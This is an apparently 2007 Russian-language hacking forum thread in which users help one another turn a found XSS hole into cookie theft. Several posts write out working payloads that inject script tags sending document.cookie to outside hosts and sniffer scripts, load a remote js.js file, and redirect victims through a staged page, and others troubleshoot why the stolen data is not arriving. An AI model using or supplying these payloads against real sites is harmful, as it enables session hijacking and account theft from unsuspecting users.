помогите с Xss

Discussion in 'Песочница' started by Aerot1smo, 1 Feb 2007.

  1. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

    site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

    и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
     
  2. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    да ты все верно понял но мне кажется лутше делай так:

    1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script>
    js.js
    img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;
    2) Или залей на какуюто страницу лутше index.htm

    <script language="JavaScript">
    document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>";
    </script>

    кажысь так все у тебя получится
     
  3. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    да,я так пробывал тока вот чёто неприходили данные.На халявных хостах будет пахать?
     
  4. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    должно ... если у тебя неполучится на фрее-хостах попробуй ачатовской сниффер.)
     
  5. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php
    какой адресс замой картинки то?

    и ещё,я вот ищу хсс спомощью проги Acunetix 4
    и он находит хсс в "/",возможно ли её осуществить,если да то как?
     
    #5 Aerot1smo, 2 Feb 2007
    Last edited: 2 Feb 2007
  6. none222

    none222 Guest

    Reputations:
    0
    попробуй так:
    site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
     
  7. Yrik123

    Yrik123 New Member

    Joined:
    29 Jan 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ребят скажите почему это не работает:
    Вызов из ява-скрипта :
    <script>
    img = new Image();
    img.src = "http://адрес/sniffer.gif?"+document.cookie;
    </script>
    пробовал так, создал файлик html, его содержание:
    <br>
    <br>
    <a href="http://google.com">google</a><br>
    <script>
    img = new image();
    img.src = "http://адрес/sniffer.gif?"+document.cookie;
    </script>
    <br>

    На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...
     
  8. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Только зачем страница с XSS где ты нашел, не пойму!?